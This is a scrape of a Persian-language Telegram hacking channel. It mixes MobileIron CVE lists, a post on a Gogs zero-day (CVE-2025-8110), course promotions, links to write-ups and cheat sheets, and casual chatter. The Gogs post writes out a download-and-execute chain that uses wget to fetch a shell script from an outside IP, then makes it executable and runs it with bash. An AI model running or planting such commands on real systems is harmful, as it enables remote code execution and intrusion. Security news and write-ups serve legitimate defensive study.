MobileIron
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
یک پلتفرم برای مدیریت دستگاه های تلفن همراه برای سازمان هاست
ویژگیهای کلیدی MobileIron:
▫️Unified Endpoint Management (UEM)
▫️Zero Trust Security
▫️Mobile Threat Defense (MTD)
▫️Cross-Platform Management (iOS, Android, Windows, macOS)
▫️Containerization (Data Separation)
▫️Identity and Access Management (IAM)
▫️Automated Compliance and Remediation
▫️Per-App Secure VPN
▫️Comprehensive Reporting and Admin Dashboard
لیستی از مهمترین آسیبپذیریهای MobileIron:
▫️CVE-2023-35082: Remote Unauthenticated API Access Vulnerability (Score: 10.0)
▫️CVE-2023-35078: Remote Unauthenticated API Access Vulnerability / Authentication Bypass (Score: 9.8)
▫️CVE-2023-38035: API Authentication Bypass on Sentry Administrator Interface (Score: 9.8)
▫️CVE-2020-15505: Remote Code Execution (RCE) via Unspecified Vectors (Score: 9.8)
▫️CVE-2020-15506: Authentication Bypass (Score: 9.8)
▫️CVE-2020-15507: Arbitrary File Reading (Score: 7.5)
▫️CVE-2021-3540: Escaping Restricted Shell / Privilege Escalation (Score: N/A publicly listed, but impacts privilege)
#Service_hunting
@hackhaven_new
❤7👍1
یدونه zero day برای Gogs اومده که خیلی بحاله
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده
نیاز به یک یوزر عادی داره و No authentication نیست.
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
wiz.io
Gogs Zero-Day RCE (CVE-2025-8110) Actively Exploited | Wiz Blog
Wiz Research discovered a Gogs zero-day (CVE-2025-8110) that bypasses a previous RCE fix via symlinks, leading to file overwrite and remote code execution.
❤6
Hack Haven
یدونه zero day برای Gogs اومده که خیلی بحاله بخاطر درست پچ نشدن cve قبلی(CVE-2024-55947) این باگ بوجود اومده نیاز به یک یوزر عادی داره و No authentication نیست. https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
exploit
-دانلود فایل اتکر:
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
– اجرای شل
@hackhaven_new
-دانلود فایل اتکر:
sshCommand = wget http://106.53.108.81/123.sh -O /tmp/123.sh
بجای اینکه به گیت وصل شه فایل رو دانلود میکنه
executable کردن فایل-
sshCommand = chmod +x /tmp/123.sh
– اجرای شل
sshCommand = bash /tmp/123.sh
@hackhaven_new
❤5
Forwarded from PentesterLand Academy - Public
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
نظرت رو راجب این پست باهام مطرح کن ❤️🔥
فرقی نمیکنه بخوای مهاجرت کنی یا فریلنسری کار کنی این پست مطمئنم بخشی از نیازت رو برطرف میکنه
https://www.instagram.com/reel/DSPnPq3jXcL/?igsh=emRvbjU3ZTRjc2Np
Instagram
@pentesterland
این فقط یک رودمپ ساده یا یک نقشه راه برای مبتدیان نیست، بلکه یک راهنمای اصولی براساس سطح شحص است، فرقی نمیکنه تازه بخوای شروع کنی و ه.کر بشی یا نه حتی سابقه کار داری یا باگ هانتر هستی، این پیام اینده کاریت رو بهتر خواهد کرد
نظرت رو راجب این پست باهام مطرح…
نظرت رو راجب این پست باهام مطرح…
❤11👎1
Account hijacking using “dirty dancing” in sign-in OAuth-flows: https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/
Labs Detectify
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Combining response-type switching, invalid state and redirect-uri quirks using OAuth, with third-party javanoscript-inclusions has multiple vulnerable scenarios where authorization codes or tokens could leak to an attacker. This could be used in attacks for…
❤5
یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم.
خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
🤣23
Hack Haven
یوتیوب درآمد یوتیوبرای فارسی رو شدیدا کم کرده. ۴سالی بود میخواستم چنل یوتیوب بزنم تولید محتوا کنم. خداروشکر دیگه عذاب وجدان ندارم که انجام ندادم.
This media is not supported in your browser
VIEW IN TELEGRAM
😁3🍓2
Forwarded from PentesterLand Academy - Public
بی پرده ترین، بی سانسور ترین
و کامل ترین حالت ممکن از یک رایتاپ اینجاست
شرح اسیب پذیری
ترکیبش با اسیب پذیری دیگر
و اینکه داپلیکیت شد ولی در نهایت با اینکه واقعا داپ بود، تبدیل به ده هزار دلار شد
دوس داشتی نشرش بده رفیق ❤️🔥
https://www.instagram.com/reel/DSXVKl7Doh0/?igsh=bHFtaGFqcDRhYzYz
و کامل ترین حالت ممکن از یک رایتاپ اینجاست
شرح اسیب پذیری
ترکیبش با اسیب پذیری دیگر
و اینکه داپلیکیت شد ولی در نهایت با اینکه واقعا داپ بود، تبدیل به ده هزار دلار شد
دوس داشتی نشرش بده رفیق ❤️🔥
https://www.instagram.com/reel/DSXVKl7Doh0/?igsh=bHFtaGFqcDRhYzYz
Instagram
@pentesterland
اینبار دیگه متفاوته
وقتی محمدرضا گلزار میخواد بیاد به کمکمولی قبل از اومدنش کار رو جمع میکنم 😉
بی پرده و سانسور گفتم چجوری صفر تبدیل به ده هزارتا
اگه به محتوای پیشرفته هک و امنیت به دید یک شغل حرفه ای علاقه داری یا میخوای بدونی باید به صورت عمومی حواست…
اینبار دیگه متفاوته
وقتی محمدرضا گلزار میخواد بیاد به کمکمولی قبل از اومدنش کار رو جمع میکنم 😉
بی پرده و سانسور گفتم چجوری صفر تبدیل به ده هزارتا
اگه به محتوای پیشرفته هک و امنیت به دید یک شغل حرفه ای علاقه داری یا میخوای بدونی باید به صورت عمومی حواست…
❤10
GitHub - hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
GitHub
GitHub - hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks
Various tips & tricks. Contribute to hackerschoice/thc-tips-tricks-hacks-cheat-sheet development by creating an account on GitHub.
❤7
https://jvns.ca/blog/2022/04/12/a-list-of-new-ish--command-line-tools/
https://github.com/ibraheemdev/modern-unix
دوتا سایت برای جایگزینی ابزارهای لینوکس
https://github.com/ibraheemdev/modern-unix
دوتا سایت برای جایگزینی ابزارهای لینوکس
Julia Evans
A list of new(ish) command line tools
Hello! Today I asked on twitter about newer command line tools, like ripgrep and fd and fzf and exa and bat.
❤4
آمریکا اهدای گرین کارت
از طریق لاتاری را تعطیل کرد
دیگه نیاز نیست نیست منتظر جواب لاتاری باشیم
🔥12😢3👏1